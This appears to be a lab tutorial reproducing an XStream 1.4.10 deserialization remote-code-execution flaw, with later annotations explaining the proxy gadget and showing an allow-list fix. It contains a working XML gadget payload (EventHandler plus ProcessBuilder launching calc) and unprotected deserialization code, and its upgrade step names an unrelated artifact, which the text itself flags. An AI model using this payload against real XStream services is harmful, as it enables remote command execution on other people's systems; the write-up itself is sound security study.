XStream Deserialization Vulnerability Test Practice

XStream is an open-source library that serializes Java objects to XML and deserializes XML back into Java objects.

1. Create a Maven project in IDEA

2. Add the vulnerable version of the dependency in pom.xml

<dependencies>
    <dependency>
        <groupId>com.thoughtworks.xstream</groupId>
        <artifactId>xstream</artifactId>
        <version>1.4.10</version>
    </dependency>
</dependencies>


3. Create a Person class

// Plain data class used for the serialization round trip in step 4.
// XStream does not need a no-arg constructor; it instantiates the class reflectively.
class Person
{
    private String name;
    private int age;
    public Person(String name,int age)
    {
        this.name=name;
        this.age=age;
    }
    @Override
    public String toString()
    {
        return "Person [name=" + name + ", age=" + age + "]";
    }
}


4. Create a main function and test it

import com.thoughtworks.xstream.XStream;
import com.thoughtworks.xstream.io.xml.DomDriver;

public class Main {
    public static void main(String args[]) throws Exception{
        /*XML serialization*/
        Person person=new Person("张四",19);
        XStream xstream = new XStream(new DomDriver());//create the XStream instance with a DOM-based XML parser
        //serialize
        String xml = xstream.toXML(person);
        System.out.println(xml);
        //deserialize
        person=(Person)xstream.fromXML(xml);
        System.out.println(person);
    }
}


As you can see, XStream is already warning that it is at risk: XStream 1.4.10 prints a warning to stderr the first time fromXML is called if its security framework has not been initialized.

5. Create an interface

public interface Car {
    void start();
    void run();
    void stop();
}


6. Create a file 1.xml and put it in the resources directory

<dynamic-proxy>
    <interface>Car</interface>
    <handler class="java.beans.EventHandler">
        <target class="java.lang.ProcessBuilder">
            <command>
                <string>calc</string>
            </command>
        </target>
        <action>start</action>
    </handler>
</dynamic-proxy>


7. Create a class that performs the deserialization

import com.thoughtworks.xstream.XStream;

import java.io.IOException;
import java.io.InputStream;

public class Rcetest {
    public void rcetest() throws IOException {
        // Load 1.xml from the classpath (src/main/resources); getResourceAsStream also
        // works when the resource is packaged inside a jar.
        try (InputStream in = this.getClass().getClassLoader().getResourceAsStream("1.xml")) {
            // Default constructor: no allow-list is configured, so XStream will
            // instantiate whatever classes the XML names.
            XStream xs = new XStream();
            // XStream builds a java.lang.reflect.Proxy implementing Car whose
            // InvocationHandler is the java.beans.EventHandler from the XML.
            Car c = (Car)xs.fromXML(in);
            // Any method call on the proxy makes EventHandler call the configured
            // action, ProcessBuilder.start(), which launches calc.
            c.run();
        }
    }
}


8. Run main

public class Main {
    public static void main(String args[]) throws Exception{
        /*XML serialization*/
        /*Person person=new Person("张四",19);
        XStream xstream = new XStream(new DomDriver());//create the XStream instance with a DOM-based XML parser
        //serialize
        String xml = xstream.toXML(person);
        System.out.println(xml);
        //deserialize
        person=(Person)xstream.fromXML(xml);
        System.out.println(person);*/
        Rcetest mytest =new Rcetest();
        mytest.rcetest();
    }
}


I'll spend some time analyzing the cause later.
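The reason c.run() launches calc does not depend on XStream itself; XStream's dynamic-proxy converter only assembles a standard java.lang.reflect.Proxy whose InvocationHandler is the java.beans.EventHandler described in 1.xml. The example below is added here and is not code from the original post: it builds that proxy by hand, with a harmless recording class standing in for java.lang.ProcessBuilder so nothing is executed, and shows that every interface method on the proxy ends up calling the target's "start" action. It assumes the Car interface from step 5 is in the same (default) package; RecordingTarget and buildProxy are names chosen for this demo.

```java
import java.beans.EventHandler;
import java.lang.reflect.InvocationHandler;
import java.lang.reflect.Proxy;

public class ProxyGadgetDemo {

    // Stand-in for java.lang.ProcessBuilder (hypothetical class for this demo).
    // EventHandler requires the target class and the action method to be public,
    // which is exactly what ProcessBuilder.start() satisfies in the real payload.
    public static class RecordingTarget {
        private int startCalls = 0;
        public void start() { startCalls++; }
        public int getStartCalls() { return startCalls; }
    }

    /**
     * Equivalent of what <dynamic-proxy> in 1.xml makes XStream build:
     * a Proxy for Car whose handler is EventHandler(target, action).
     * listenerMethodName == null means every Car method triggers the action;
     * eventPropertyName == null means the action is called with no arguments.
     */
    static Car buildProxy(Object target, String action) {
        InvocationHandler handler = new EventHandler(target, action, null, null);
        return (Car) Proxy.newProxyInstance(
                Car.class.getClassLoader(), new Class<?>[]{Car.class}, handler);
    }

    public static void main(String[] args) {
        RecordingTarget target = new RecordingTarget();
        Car car = buildProxy(target, "start");

        // Which Car method is called does not matter: EventHandler ignores the
        // interface method name and invokes target.start() each time.
        car.run();
        car.stop();
        System.out.println("target.start() was invoked " + target.getStartCalls() + " times");

        // In the real payload the target is new ProcessBuilder("calc"), so the
        // very same dispatch resolves to ProcessBuilder.start() and spawns the process.
    }
}
```

This is why the vulnerability is triggered by a later method call on the deserialized object rather than by fromXML itself: the command runs on the first Car method the application invokes on the proxy.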

Recommended fix: upgrade the version. Note that the artifact below is not XStream itself; the dependency that actually has to be upgraded is com.thoughtworks.xstream:xstream, and whichever version is used, the security framework should be initialized explicitly (XStream.setupDefaultSecurity(xs), or better an allow-list via allowTypes) rather than relying on the defaults.

<dependency>
    <groupId>com.alipay.fc.supergw</groupId>
    <artifactId>fcsupergw-unimsg</artifactId>
    <version>2.0.0.20200805</version>
</dependency>

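As an added example that is not part of the original post, here is the hardened form of the same XStream 1.4.x setup: instead of the default constructor, the instance starts from NoTypePermission.NONE and re-enables only null, primitives, String and Person. It round-trips the Person object from step 3 and rejects the 1.xml payload with ForbiddenClassException before any class from the XML is instantiated. It assumes the Person class and Car interface from the post are in the same (default) package; the PAYLOAD string is the content of 1.xml embedded inline, and hardenedXStream is a name chosen for this demo.

```java
import com.thoughtworks.xstream.XStream;
import com.thoughtworks.xstream.io.xml.DomDriver;
import com.thoughtworks.xstream.security.ForbiddenClassException;
import com.thoughtworks.xstream.security.NoTypePermission;
import com.thoughtworks.xstream.security.NullPermission;
import com.thoughtworks.xstream.security.PrimitiveTypePermission;

public class SafeXStreamDemo {

    // The gadget payload from 1.xml, embedded inline for the demo.
    static final String PAYLOAD =
        "<dynamic-proxy>\n" +
        "    <interface>Car</interface>\n" +
        "    <handler class=\"java.beans.EventHandler\">\n" +
        "        <target class=\"java.lang.ProcessBuilder\">\n" +
        "            <command>\n" +
        "                <string>calc</string>\n" +
        "            </command>\n" +
        "        </target>\n" +
        "        <action>start</action>\n" +
        "    </handler>\n" +
        "</dynamic-proxy>";

    /** XStream instance that may only instantiate the classes this application expects. */
    static XStream hardenedXStream() {
        XStream xs = new XStream(new DomDriver());
        // NoTypePermission.NONE clears every permission: nothing is allowed by default.
        xs.addPermission(NoTypePermission.NONE);
        // Re-enable the minimum needed for our own data: null, primitives, String, Person.
        xs.addPermission(NullPermission.NULL);
        xs.addPermission(PrimitiveTypePermission.PRIMITIVES);
        xs.allowTypes(new Class[]{String.class, Person.class});
        return xs;
    }

    public static void main(String[] args) {
        XStream xs = hardenedXStream();

        // Legitimate data still round-trips.
        Person person = new Person("张四", 19);
        Person back = (Person) xs.fromXML(xs.toXML(person));
        System.out.println("round trip: " + back);

        // The dynamic-proxy element resolves to a type that is not on the allow-list,
        // so the SecurityMapper rejects it and EventHandler/ProcessBuilder are never built.
        try {
            xs.fromXML(PAYLOAD);
            System.out.println("UNEXPECTED: payload was accepted");
        } catch (ForbiddenClassException e) {
            System.out.println("payload rejected: " + e.getMessage());
        }
    }
}
```

Calling only XStream.setupDefaultSecurity(xs) (available from 1.4.10) applies the library's built-in deny-list, which blocks the gadget classes that are already known; the allow-list above is stronger because any class the application did not name is refused, including gadgets discovered after the library was released.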

Original post: https://www.cnblogs.com/fczlm/p/14440728.html